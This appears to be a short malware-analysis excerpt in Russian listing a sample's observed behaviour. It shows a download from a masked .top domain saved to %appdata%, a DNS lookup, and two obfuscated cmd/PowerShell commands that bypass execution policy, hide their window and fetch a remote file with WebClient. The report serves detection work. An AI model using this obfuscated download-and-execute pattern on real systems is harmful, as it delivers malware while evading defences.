Техническая информация
- http://ho####wergop.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^w^ER^s^HeLL^.exe -exe^cUt^ION^p^Oli^CY ^bypasS -no^pRoFI^Le -w^InDowS^t^y^LE^ ^Hi^dde^N (N^ew-o^bjE^c^t S^y^St^e^M^.^NE^t.W^EbC^li^ENt)^.D^ow^NLO^Ad^fi^le^(^'http://ho#...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "po^w^ER^s^HeLL^.exe -exe^cUt^ION^p^Oli^CY ^bypasS -no^pRoFI^Le -w^InDowS^t^y^LE^ ^Hi^dde^N (N^ew-o^bjE^c^t S^y^St^e^M^.^NE^t.W^EbC^li^ENt)^.D^ow^NLO^Ad^fi^le^(^'http://ho#...' (со скрытым окном)